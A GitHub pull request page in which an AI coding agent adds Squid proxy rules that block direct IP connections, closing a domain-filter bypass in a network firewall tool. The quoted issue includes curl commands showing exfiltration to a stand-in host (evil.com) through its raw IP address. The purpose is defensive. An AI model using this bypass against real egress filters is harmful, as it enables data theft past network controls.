Skip to content

fix: block direct IP address connections to prevent domain filter bypass #330

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
Copilot wants to merge 3 commits into
base: main
Choose a base branch
from
Open

fix: block direct IP address connections to prevent domain filter bypass #330

Copilot wants to merge 3 commits into from

Conversation

Copy link
Contributor

Copilot AI commented Jan 17, 2026
edited
Loading

Direct IP+TLS connections bypass domain-based filtering since Squid cannot extract SNI when clients connect to raw IP addresses instead of hostnames.

Changes

  • IPv4 blocking: Added dstdom_regex ACL matching dotted-decimal format (^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$)
  • IPv6 blocking: Added ACL matching destinations containing colons (valid domains cannot contain colons per RFC 1123)
  • Rule placement: Deny rules placed before domain allowlist checks

Generated Squid config now includes:

# Security: Block direct IP address connections
acl dest_is_ipv4 dstdom_regex ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$
acl dest_is_ipv6 dstdom_regex :
http_access deny dest_is_ipv4
http_access deny dest_is_ipv6

Design notes

  • Uses bounded quantifiers {1,3} instead of + to prevent ReDoS
  • Intentionally over-inclusive (blocks 999.999.999.999) — security blocklist should be broad
  • Colon detection is safe for IPv6 since dstdom_regex only matches destination host, not URL paths
Original prompt

This section details on the original issue you should resolve

<issue_title>[Security] Direct IP + TLS connections may bypass domain filtering</issue_title>
<issue_description>## Priority
P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

  • Only traffic to Squid (172.30.0.10) and DNS servers is allowed
  • All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

  1. Squid ACL: Explicit deny for non-domain CONNECT requests
  2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

  • src/squid-config.ts - Add IP CONNECT deny rule
  • src/squid-config.test.ts - Test IP CONNECT is denied
  • Verification script for testing

Testing

  • Direct IP HTTPS is blocked
  • Domain-based HTTPS still works
  • Squid logs show IP CONNECT attempts as denied
  • Host iptables provides backup blocking</issue_description>

Comments on the Issue (you are @copilot in this section)

💡 You can make Copilot smarter by setting up custom instructions, customizing its development environment and configuring Model Context Protocol (MCP) servers. Learn more Copilot coding agent tips in the docs.

Copilot AI and others added 2 commits January 17, 2026 21:15
@Mossaka
fix: block direct IP address connections in Squid config
5b2b315 
Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>
@Mossaka
docs: improve comments for IP blocking ACLs
fb74e87 
Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>
Copilot AI changed the title [WIP] Fix direct IP and TLS connections bypassing domain filtering fix: block direct IP address connections to prevent domain filter bypass Jan 17, 2026
Copilot AI requested a review from Mossaka January 17, 2026 21:18
@Mossaka Mossaka marked this pull request as ready for review January 18, 2026 01:38
@github-actions
Copy link

github-actions bot commented Jan 18, 2026

✅ Coverage Check Passed

Overall Coverage

Metric Base PR Delta
Lines 77.88% 77.88% ➡️ +0.00%
Statements 77.94% 77.94% ➡️ +0.00%
Functions 77.29% 77.29% ➡️ +0.00%
Branches 71.00% 71.00% ➡️ +0.00%

Coverage comparison generated by scripts/ci/compare-coverage.ts

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@Mossaka Mossaka Awaiting requested review from Mossaka

Assignees

@Mossaka Mossaka

Copilot code review Copilot

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

[Security] Direct IP + TLS connections may bypass domain filtering

2 participants

@Mossaka